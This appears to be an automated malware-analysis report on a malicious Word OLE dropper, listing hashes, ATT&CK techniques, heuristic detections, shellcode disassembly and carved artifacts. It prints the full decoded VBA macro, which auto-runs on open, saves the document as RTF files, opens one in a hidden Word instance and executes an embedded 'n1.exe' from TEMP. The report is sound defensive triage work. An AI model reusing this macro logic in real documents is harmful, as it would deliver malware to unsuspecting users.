Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cc8b64b3f0115c9f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 94.5 KB
Created: 2015-10-06 17:48:00
Authoring application: Microsoft Office Word
First seen: 2017-10-10
MD5: b68307d815f782f421fd1050d36265e5
SHA-1: bd6e6de868628c9af8c67f92166843923d8cb7e1
SHA-256: cc8b64b3f0115c9fb0b7e7b048a5090bd41e313cf6ccf3ffa85f15c31bce3c58
Risk score: 574

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample is a malicious Office document that uses a lure to convince the user to enable content, which then triggers VBA macros. The VBA macro 'Indefrakks' is designed to save two RTF files and then execute a dropped PE executable named 'n1.exe' from the temporary directory. This executable is embedded within the OLE structure.

Heuristics (18)

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation (severity: high; tag: CVE likely; rule: CVE_2026_21514)
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Downloader.Generic-6698421-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0.
  • Embedded PE executable (severity: critical; rule: OLE_EMBEDDED_EXE)
    MZ/PE header found inside the document — possible embedded executable.
  • Ole10Native package drops an auto-executable payload (severity: critical; rule: OFFICE_PACKAGE_RISKY_FILE)
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected (severity: medium; 7 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • Potential Shell call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Matched lines in script:
    Sameit (2)
    Shell (TEX)
    Sameit (1)
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    Matched lines in script:
    Sameit (2)
    Set sttKaka = CreateObject("Word.Application")
    sttKaka.Visible = False
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low; rule: OLE_VBA_AUTOOPEN)
    Matched lines in script:
    End Sub
    Sub AutoOpen()
        QJHKDAJSD = "qjdilqwhdalskjdkalsjd askldjas ldjas"
  • Workbook_Open macro (severity: low; rule: OLE_VBA_WBOPEN)
    Matched lines in script:
    End Sub
    Sub Workbook_Open()
        HQKJASNDSA = "asjdk jksdhasdjkashdlkjlsa dahjskdas"
  • Auto_Open macro (severity: low; rule: OLE_VBA_AUTO)
    Matched lines in script:
        QJHKDAJSD = "qjdilqwhdalskjdkalsjd askldjas ldjas"
        Auto_Open
    End Sub
  • Environ() call (env variable access) (severity: low; rule: OLE_VBA_ENVIRON)
    Matched lines in script:
    On Error Resume Next
    TMP = Environ$("TEMP") + "\"
    TEX = TMP + "n1." & "ex"
  • x86 GetPC stub (CALL $+5; POP EAX) (severity: high; rule: SC_GETPC_CALL)
    Disassembly (attempted x86 opcode disassembly of the candidate region):
    00008733  e800000000        call 0x8738
    00008738  58                pop eax
    00008739  87d2              xchg edx, edx
    0000873B  7401              je 0x873e
    0000873D  90                nop
    0000873E  6793              xchg ebx, eax
    00008740  6793              xchg ebx, eax
    00008742  7306              jae 0x874a
    00008744  81e900000000      sub ecx, 0
    0000874A  6623f6            and si, si
    0000874D  66c1c740          rol di, 0x40
    00008751  7707              ja 0x875a
    00008753  52                push edx
    00008754  6a8a              push -0x76
    00008756  83c404            add esp, 4
    00008759  5a                pop edx
    0000875A  c1cba0            ror ebx, 0xa0
    0000875D  f8                clc
    0000875E  66a936d5          test ax, 0xd536
    00008762  7706              ja 0x876a
    00008764  56                push esi
    00008765  6683e0ff          and ax, 0xffff
    00008769  5e                pop esi
    0000876A  7208              jb 0x8774
    0000876C  7e06              jle 0x8774
    0000876E  81c900000000      or ecx, 0
    00008774  57                push edi
    00008775  7b06              jnp 0x877d
    00008777  55                push ebp
    00008778  6683e3ff          and bx, 0xffff
    0000877C  5d                pop ebp
    0000877D  5f                pop edi
    0000877E  56                push esi
    0000877F  7f04              jg 0x8785
    00008781  6683e2ff          and dx, 0xffff
    00008785  5e                pop esi
    00008786  55                push ebp
    00008787  23d2              and edx, edx
    00008789  5d                pop ebp
    0000878A  55                push ebp
    0000878B  7405              je 0x8792
    0000878D  25ffffffff        and eax, 0xffffffff
    00008792  5d                pop ebp
  • PEB access via FS segment (x86) (severity: high; rule: SC_PEB_ACCESS)
    Disassembly (attempted x86 opcode disassembly of the candidate region):
    00007D0A  64a130000000      mov eax, dword ptr fs:[0x30]
    00007D10  89c7              mov edi, eax
    00007D12  894f08            mov dword ptr [edi + 8], ecx
    00007D15  8b470c            mov eax, dword ptr [edi + 0xc]
    00007D18  8b400c            mov eax, dword ptr [eax + 0xc]
    00007D1B  894818            mov dword ptr [eax + 0x18], ecx
    00007D1E  6800800000        push 0x8000
    00007D23  7104              jno 0x7d29
    00007D25  6683e5ff          and bp, 0xffff
    00007D29  f8                clc
    00007D2A  7006              jo 0x7d32
    00007D2C  55                push ebp
    00007D2D  51                push ecx
    00007D2E  0af6              or dh, dh
    00007D30  59                pop ecx
    00007D31  5d                pop ebp
    00007D32  6a00              push 0
    00007D34  89d8              mov eax, ebx
    00007D36  3500000000        xor eax, 0
    00007D3B  0bd2              or edx, edx
    00007D3D  25ffffffff        and eax, 0xffffffff
    00007D42  2500f0ffff        and eax, 0xfffff000
    00007D47  50                push eax
    00007D48  8d36              lea esi, [esi]
    00007D4A  55                push ebp
    00007D4B  7906              jns 0x7d53
    00007D4D  7c04              jl 0x7d53
    00007D4F  f6df              neg bh
    00007D51  f6df              neg bh
    00007D53  5d                pop ebp
    00007D54  f8                clc
    00007D55  84c0              test al, al
    00007D57  8b4228            mov eax, dword ptr [edx + 0x28]
    00007D5A  0345f8            add eax, dword ptr [ebp - 8]
    00007D5D  90                nop
    00007D5E  7807              js 0x7d67
    00007D60  7705              ja 0x7d67
    00007D62  53                push ebx
    00007D63  6a2b              push 0x2b
    00007D65  5b                pop ebx
    00007D66  5b                pop ebx
    00007D67  8be4              mov esp, esp
    00007D69  51                push ecx
  • Suspicious extracted artifact (severity: high; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure (severity: medium; rule: SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1452 bytes
SHA-256: 12e6e5acff32875c01f551e370c31682c3a6e7bef976aa6d87c993a16b9db85e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub JIjashdjkasd_Open()
    NQJKHDJAKSD = "askjd askljdasjhdjkashdjkasd hkasd "
End Sub
Sub AutoOpen()
    QJHKDAJSD = "qjdilqwhdalskjdkalsjd askldjas ldjas"
    Auto_Open
End Sub
Sub Indefrakks()
On Error Resume Next
TMP = Environ$("TEMP") + "\"
TEX = TMP + "n1." & "ex"
TCA = TMP + "300.rtf"
TCB = TMP + "301.rtf"
TEX = TEX + "e"

SaveAsRTF (TCA)
SaveAsRTF (TCB)
Sameit (2)
Set sttKaka = CreateObject("Word.Application")
sttKaka.Visible = False
Set docWord = sttKaka.Documents.Open(TCA)
Sameit (2)
Shell (TEX)
Sameit (1)
sttKaka.Quit
Set sttKaka = Nothing
Kill TCA
Kill TEX
End Sub
Sub Magitinal()
    QHWKJDHASJDH = "asjhd kasjdlkqjwdilqw hdjkasdhas d"
    Indefrakks
End Sub
Sub Workbook_Open()
    HQKJASNDSA = "asjdk jksdhasdjkashdlkjlsa dahjskdas"
    Magitinal
End Sub
Sub Sameit(Kalamana As Long)
Dim Jhbhds As Long
Jhbhds = Timer + Kalamana
Do While Timer < Jhbhds
DoEvents
Loop
End Sub
Public Function SaveAsRTF(Name As String)
    ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function
Sub Auto_Open()
    Magitinal
    QUKDHASD = "asjdlaksj dlkasjd kashjd as"
End Sub
embedded_office_00007248.exe | embedded-pe | Office MZ+PE at offset 0x7248 | 67516 bytes
SHA-256: 0c5531a185abbda32b7e9a44c79b208f9c33d544329f0bfc1d64aba39da1d5a3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_GETPC_CALL, SC_PEB_ACCESS, SC_GETPC_CALL.
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1505647964/Ole10Native | 47802 bytes
SHA-256: ebb702ef44d07c63cd1f81e012617b5c0bea63bc0b34274b3e427276b1597761
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_GETPC_CALL, SC_PEB_ACCESS, SC_GETPC_CALL.